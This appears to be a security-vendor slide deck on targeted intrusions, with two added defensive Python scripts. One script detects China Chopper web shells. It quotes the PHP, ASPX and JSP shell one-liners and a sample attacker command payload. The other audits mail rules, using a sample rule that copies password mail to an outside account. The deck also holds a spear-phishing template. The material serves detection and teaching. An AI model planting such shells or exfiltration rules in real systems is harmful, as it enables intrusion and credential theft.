Threat actors are increasingly employing evasive tactics that bypass traditional security controls, including more advanced technologies such as sandboxing. In this session, Dell SecureWorks will share examples of tactics used, their impact, what this means for organizations and new capabilities for addressing the risk posed by these threats.
7. What industry verticals are victims?
Targeted Intrusion Victims by Industry Vertical
Manufacturing: 46%
Technology Provider: 19%
Education: 12%
Other Services: 8%
Retail: 4%
Business Services: 4%
Media: 4%
Misc. Financial: 4%
Source: Targeted Threat Responses Jan 2015 – Sept 2015
8. Threat groups
Attributes used to identify candidate threat groups:
• Known Tools (Infrastructure)
• Known Targets (pre-Compromise) & Victims (post-Compromise)
• Known Techniques & Procedures (Capability)
• Known Identity
12. Watch your webmail… spear phishing to corporate and personal mail
From: XXXXXXXX XXXXXXXX [mailto:xxxxxx.yyyyyyyy@zzzzzzzzz.zzz]
Sent: XXXXXXX, XXXXXXXX ##, 201X 11:01 PM
To: XXXXXXXX, XXXXXXXX
Subject: Internal Security Survey
Dear all,
Key target is finding and exploring company internal security problems in 201X.
Download the report: http://<company web domain>/download/survey.pdf
please fill the report and send to xxxxxx.yyyyyyyy@zzzzzzzzz.zzz tomorrow morning.
IT Department
13. Strategic Web Compromise (SWC)
1. Adversary identifies websites known or suspected to be visited by the designated target
2. Identified sites are probed for vulnerabilities
3. Adversary places exploits on one or more sites where they are likely to be accessed by targets
4. Users visit the malicious website
5. Exploits are attempted against visitors; delivery is often filtered by IP address or other characteristics of the visitor
6. Initial foothold malware is delivered to the victim
[Diagram: Sites of Interest → Identify Vulnerable Site & Place Exploit → User Visits Compromised Site → Exploit used to deliver initial foothold malware]
14. Exploiting weakness
1. Scans website for available vulnerabilities
2. Identifies Struts with unpatched vulnerabilities
3. Deploys China Chopper web shell
4. Adversary can now try to escalate privileges, dump passwords and move laterally in the internal network
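The sequence above ends with a China Chopper shell sitting in the web root, and that is the first thing a defender can look for. The following is an added example, not SecureWorks code and not taken from the deck: it scans file contents for the publicly documented one-liner shapes of the shell (PHP, ASPX and the JSP upload variant that fits a Struts host) and inspects POST bodies for the client's calling convention (an eval() of a base64 blob carried in z0, z1, … fields) and the "->|" / "|<-" reply delimiters. The file paths, file contents and request bodies are constructed for the demonstration.

```python
# Added example (not from the SecureWorks deck): hunting for the China Chopper
# web shell that the slide shows being dropped after a Struts exploit.
# File contents, paths and POST bodies below are constructed for the demo.
import base64
import binascii
import re
from urllib.parse import parse_qs, urlencode

# Server-side one-liners the China Chopper client talks to. These are the
# publicly documented shapes of the shell; a real scan would also catch
# variants by looking for eval() of a request parameter more generally.
WEBSHELL_PATTERNS = {
    "php-eval-post": re.compile(
        r"<\?php\s*@?eval\s*\(\s*\$_(?:POST|REQUEST|GET)\s*\[", re.I),
    "aspx-jscript-eval": re.compile(
        r'eval\s*\(\s*Request\.Item\s*\[[^\]]*\]\s*,\s*"unsafe"\s*\)', re.I),
    "jsp-fileoutputstream-upload": re.compile(
        r"new\s+java\.io\.FileOutputStream\s*\(\s*application\.getRealPath\s*\(.*?\)"
        r"\s*\+\s*request\.getParameter\s*\(", re.I | re.S),
}

# Constructed web-root snapshot: one legitimate page plus three shells.
SAMPLE_FILES = {
    "/var/www/app/index.jsp": '<%@ page contentType="text/html" %>\n<html><body>Hello</body></html>\n',
    "/var/www/app/images/help.jsp": (
        '<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream('
        'application.getRealPath("\\\\")+request.getParameter("f")))'
        '.write(request.getParameter("t").getBytes());%>'),
    "/var/www/app/css/x.php": "<?php @eval($_POST['password']);?>",
    "/var/www/app/tmp/a.aspx": '<%@ Page Language="Jscript"%><%eval(Request.Item["password"],"unsafe");%>',
}


def scan_files(files):
    """Return {path: pattern_name} for every file whose content matches a shell pattern."""
    hits = {}
    for path, content in files.items():
        for name, pattern in WEBSHELL_PATTERNS.items():
            if pattern.search(content):
                hits[path] = name
                break
    return hits


# Client side: the operator's POST carries an eval() of a base64 blob held in
# numbered fields z0, z1, ...; the shell wraps its reply in "->|" ... "|<-".
_EVAL_RE = re.compile(r"@?\beval\b|FromBase64String|base64_decode", re.I)
_Z_FIELD = re.compile(r"^z\d+$")


def _b64_or_none(value):
    try:
        return base64.b64decode(value, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def inspect_post_body(body):
    """Flag a form body that looks like a China Chopper command; decode its z-fields."""
    fields = parse_qs(body, keep_blank_values=True)
    control = {k: v[0] for k, v in fields.items() if v and _EVAL_RE.search(v[0])}
    decoded = {}
    for key, values in fields.items():
        if _Z_FIELD.match(key) and values:
            text = _b64_or_none(values[0])
            if text is not None:
                decoded[key] = text
    return {
        "suspicious": bool(control) and bool(decoded),
        "control_field": next(iter(control), None),
        "decoded": decoded,
    }


def is_chopper_response(body):
    """The shell's reply delimiters are a cheap, reliable network signature."""
    return body.startswith("->|") and body.endswith("|<-")


# Constructed traffic: the PHP client payload (the \x01 after eval is a documented
# quirk of the client) and an ordinary login form for comparison.
_CMD = "echo 'ok';"
SAMPLE_POST = urlencode({
    "password": "@eval\x01(base64_decode($_POST[z0]));",
    "z0": base64.b64encode(_CMD.encode()).decode(),
})
BENIGN_POST = urlencode({"username": "alice", "password": "hunter2"})

if __name__ == "__main__":
    for path, kind in scan_files(SAMPLE_FILES).items():
        print(f"webshell {kind}: {path}")
    print(inspect_post_body(SAMPLE_POST))
    print(inspect_post_body(BENIGN_POST)["suspicious"])
```

The file scan is the cheap post-compromise check (run it against the web root and compare with the deployment manifest); the body inspection is what a reverse proxy or WAF log review would do, and decoding the z-fields tells you what the operator actually ran, which is the difference between "a shell exists" and "they dumped passwords".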
15. Credential abuse
• Exploitation of architecture and configuration vulnerabilities
  – just as effective
  – just as devastating
  – harder to detect
• Use of available tools instead of malware
  – Steal credentials
  – Use existing administration tools
• Malware is removed once the initial intrusion has compromised credentials
17. Living off the Land
“Transport rule found on server that blind copies any messages with ‘CMS’, ‘pw’, ‘pwd’, ‘pass’ or ‘password’ in the body or subject of an email on server XYZ to email account company2014@outlook.com”
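A rule like the one quoted above is configuration, not malware, so it is found by auditing configuration. The following is an added example, not SecureWorks code: it reads a JSON export of transport rules and flags any rule whose BlindCopyTo, CopyTo or RedirectMessageTo action points outside the organisation's own domains, raising the severity when the rule's SubjectOrBodyContainsWords condition lists credential terms. The export format is assumed to come from `Get-TransportRule | Select-Object Name,State,Priority,BlindCopyTo,CopyTo,RedirectMessageTo,SubjectOrBodyContainsWords,WhenChanged | ConvertTo-Json`; the rule set below is constructed, with the slide's mailbox and keywords used for the malicious rule and `corp.example` standing in for the internal domain.

```python
# Added example (not SecureWorks code): auditing an Exchange transport-rule
# export for rules that copy mail to an outside mailbox, the "living off the
# land" technique quoted on the slide. Input is assumed to come from
#   Get-TransportRule | Select-Object Name,State,Priority,BlindCopyTo,CopyTo,
#       RedirectMessageTo,SubjectOrBodyContainsWords,WhenChanged | ConvertTo-Json
# The export below is constructed; rule names and the internal domain are illustrative.
import json

CREDENTIAL_WORDS = {"cms", "pw", "pwd", "pass", "password", "passwd",
                    "credential", "credentials", "login", "vpn"}

SAMPLE_EXPORT = json.dumps([
    {
        "Name": "Corporate disclaimer",
        "State": "Enabled", "Priority": 0,
        "BlindCopyTo": None, "CopyTo": None, "RedirectMessageTo": None,
        "SubjectOrBodyContainsWords": None,
        "WhenChanged": "2014-03-02T09:12:00",
    },
    {
        "Name": "Copy trading desk mail to compliance",
        "State": "Enabled", "Priority": 1,
        "BlindCopyTo": None, "CopyTo": ["compliance@corp.example"],
        "RedirectMessageTo": None,
        "SubjectOrBodyContainsWords": None,
        "WhenChanged": "2014-06-18T14:40:00",
    },
    {
        # Multi-valued properties may arrive as a list or as a single string
        # depending on how the export was massaged, so the parser accepts both.
        "Name": "Security review",
        "State": "Enabled", "Priority": 2,
        "BlindCopyTo": "company2014@outlook.com", "CopyTo": None,
        "RedirectMessageTo": None,
        "SubjectOrBodyContainsWords": ["CMS", "pw", "pwd", "pass", "password"],
        "WhenChanged": "2015-08-30T02:17:00",
    },
])


def _as_list(value):
    """Normalise None / scalar / list to a list."""
    if value is None:
        return []
    return list(value) if isinstance(value, list) else [value]


def _domain(address):
    return address.rsplit("@", 1)[-1].lower()


def find_exfil_rules(export_json, internal_domains):
    """Return findings for rules that BCC, copy or redirect mail outside internal_domains."""
    internal = {d.lower() for d in internal_domains}
    findings = []
    for rule in json.loads(export_json):
        targets = []
        for action in ("BlindCopyTo", "CopyTo", "RedirectMessageTo"):
            targets.extend(_as_list(rule.get(action)))
        external = [t for t in targets if _domain(t) not in internal]
        if not external:
            continue
        words = {w.lower() for w in _as_list(rule.get("SubjectOrBodyContainsWords"))}
        cred_words = sorted(words & CREDENTIAL_WORDS)
        findings.append({
            "name": rule["Name"],
            "enabled": rule.get("State") == "Enabled",
            "external_targets": external,
            "credential_words": cred_words,
            "changed": rule.get("WhenChanged"),
            # An external copy target is always worth a look; keyword
            # conditions on credential terms make it a probable collector.
            "severity": "high" if cred_words else "medium",
        })
    return findings


if __name__ == "__main__":
    for f in find_exfil_rules(SAMPLE_EXPORT, {"corp.example"}):
        print(f"[{f['severity']}] {f['name']} -> {f['external_targets']} "
              f"words={f['credential_words']} changed={f['changed']}")
```

The WhenChanged value is kept in each finding because in a "living off the land" case the change time, cross-referenced with admin logons, is usually the fastest route from the rule back to the stolen credential that created it.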
18. Current State of Affairs
How victims learned of targeted intrusions across their organizations:
60% Third party detected adversary tradecraft
28% Notified by law enforcement or government entity
12% Staff discovered threat actor activity
Source: Targeted Threat Responses Jan 2015 – Sept 2015
50%: In half of targeted intrusions, the entry point of the threat actors was undetermined
100%: In all intrusions, threat actors “lived off the land”, using stolen credentials and native tools to achieve their mission
19. • Next Generation Toolsets provide only limited value. Tools need to be updated with the latest threat intelligence, continually monitored, and run by trained professionals.
The industry’s definition of defeat is different from our adversary's definition of winning.
20. XLSTrojan
Comfoo Trojan
Sajdela Trojan
Chinese Infostealer Blue
Butterfly Lingbo
Dynamer
Targeted-CG
Orsam
Leouncia
Huntah
Poison Ivy
Bifrose
Hupigon
PcClient
gh0st
Wkysol
ZWShell
Mswab
Mirage
Wykcores
Hydraq
Whitewell
Werchan
Foxjmp
Sanshell
Lostmin
Pirp
httpBrowser
And many more…
Malware doesn’t matter… the adversaries simply don’t care
“Ride the donkey while looking for a horse” (骑驴找马): make do with whatever is at hand while seeking something better
22. • Endpoint security controls fail
– AV fails
– Whitelisting fails
– Novel malware persistence mechanisms
› DLL Side Loading
› DLL Search Order Hijack
› Binary modification
– Memory based exploits
– Rootkits
– Even exploitation of the security software itself!
• Network controls fail
– Encrypted binary protocols over HTTP
– Use of common ports and protocols
– Frequently burning infrastructure
– Use of public services for C2 and exfil
• Log analysis detections fail
• Mobile Machine Learning Clouds of Advanced Malware Protection fail too!
“But I have a magic mobile machine learning cloud of advanced malware protection”
25. Adaptable Persistent Threat
• Not a thing, a who
• Think project management…
  – Adversary has already planned for most common defenses and responses
  – Setbacks trigger planning or strategy shifts, not abandonment
• Plan to fail…
  – History teaches us that controls fail
  – Endpoint controls fail
  – Network controls fail
  – Log and SIEM analytics fail
28. Reduce time to detect advanced threat actor activity and reduce effort to respond to their operations
29. Lots of opportunity
We win by disrupting the threat actors before they complete their mission of data exfiltration:
~1 month before data loss begins
~2 weeks to data exfiltration
~6 weeks before the threat actors win
37. DNS Telemetry
Resolution chain for a lookup of evil.foo.com, as drawn on the slide:
1. Querying host → Internal name server: request A record for evil.foo.com
2. Internal name server → .com root name server: request NS record for foo.com; NS response
3. Internal name server → foo.com authoritative name server: request A record for evil.foo.com; A record response
4. Internal name server → querying host: A record response
43. How do you win?
• Without significant tripwires, data exfiltration of sensitive intellectual property occurred in 6 weeks
• With proper visibility, the threat actors could have been detected at least 6 different ways within the first 6 hours of the intrusion
49. Context to answer the questions that matter
What is it? Is it really a threat?
Did it succeed? What happened next?
Who was behind it? What are their intentions?
Did they achieve their objectives yet?
How did they get in, where are they, how do I get them out and prevent them from winning?
What should I do next?
• Intelligence on threat actors
• Ability to collect telemetry and apply that intelligence in the network and at the endpoint
• Analytics beyond malware and signatures